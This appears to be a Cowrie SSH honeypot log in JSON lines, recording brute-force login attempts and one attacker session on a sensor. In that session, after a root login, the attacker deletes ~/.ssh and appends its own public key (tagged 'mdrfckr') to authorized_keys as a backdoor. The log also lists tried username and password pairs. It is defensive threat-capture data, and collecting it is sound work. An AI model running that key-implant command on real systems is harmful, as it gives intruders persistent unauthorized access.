{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:18.873637Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.login.success","username":"root","password":"xdr5tgb","message":"login attempt [root/xdr5tgb] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.115845Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:56:19.257076Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.257761Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.258526Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.305310Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:56:19.452155Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.452971Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.498877Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.499705Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":32910,"dst_ip":"1.2.3.4","dst_port":22,"session":"43bb766de3c3","protocol":"ssh","message":"New connection: 77.75.56.63:32910 (1.2.3.4:22) [session: 43bb766de3c3]","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.653368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.669903Z","src_ip":"77.75.56.63","session":"43bb766de3c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:19.780837Z","src_ip":"77.75.56.63","session":"43bb766de3c3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:56:20.258946Z","src_ip":"77.75.56.63","session":"43bb766de3c3"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":32912,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f14518204a9","protocol":"ssh","message":"New connection: 77.75.56.63:32912 (1.2.3.4:22) [session: 2f14518204a9]","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.330924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.332029Z","src_ip":"77.75.56.63","session":"2f14518204a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.367167Z","src_ip":"77.75.56.63","session":"2f14518204a9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.376860Z","src_ip":"77.75.56.63","session":"43bb766de3c3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.553719Z","src_ip":"77.75.56.63","session":"2f14518204a9"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.591419Z","src_ip":"77.75.56.63","session":"2f14518204a9"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:56:21.623226Z","src_ip":"77.75.56.63","session":"2d1bbab0bbd6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59736,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bc604e18f7e","protocol":"ssh","message":"New connection: 217.72.205.35:59736 (1.2.3.4:22) [session: 7bc604e18f7e]","sensor":"my-vps","timestamp":"2025-09-08T19:57:07.884339Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:07.885122Z","src_ip":"217.72.205.35","session":"7bc604e18f7e"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":45766,"dst_ip":"1.2.3.4","dst_port":22,"session":"460440edcb89","protocol":"ssh","message":"New connection: 103.206.72.2:45766 (1.2.3.4:22) [session: 460440edcb89]","sensor":"my-vps","timestamp":"2025-09-08T19:57:24.516734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:57:24.520212Z","src_ip":"103.206.72.2","session":"460440edcb89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:57:24.690919Z","src_ip":"103.206.72.2","session":"460440edcb89"}
{"eventid":"cowrie.login.failed","username":"william","password":"111111","message":"login attempt [william/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T19:57:25.391885Z","src_ip":"103.206.72.2","session":"460440edcb89"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:26.572070Z","src_ip":"103.206.72.2","session":"460440edcb89"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":43718,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed85b683781f","protocol":"ssh","message":"New connection: 77.75.56.63:43718 (1.2.3.4:22) [session: ed85b683781f]","sensor":"my-vps","timestamp":"2025-09-08T19:57:26.984740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:57:26.985512Z","src_ip":"77.75.56.63","session":"ed85b683781f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:57:27.021547Z","src_ip":"77.75.56.63","session":"ed85b683781f"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"12345","message":"login attempt [testnet/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T19:57:27.210039Z","src_ip":"77.75.56.63","session":"ed85b683781f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:28.248966Z","src_ip":"77.75.56.63","session":"ed85b683781f"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":49958,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e7dc4d12989","protocol":"ssh","message":"New connection: 139.19.117.131:49958 (1.2.3.4:22) [session: 0e7dc4d12989]","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.633989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.635320Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.651865Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.686376Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.687013Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.704195Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:57:34.704821Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.session.connect","src_ip":"81.26.205.105","src_port":38157,"dst_ip":"1.2.3.4","dst_port":22,"session":"18d47d222a3d","protocol":"ssh","message":"New connection: 81.26.205.105:38157 (1.2.3.4:22) [session: 18d47d222a3d]","sensor":"my-vps","timestamp":"2025-09-08T19:57:39.640892Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:39.900210Z","src_ip":"81.26.205.105","session":"18d47d222a3d"}
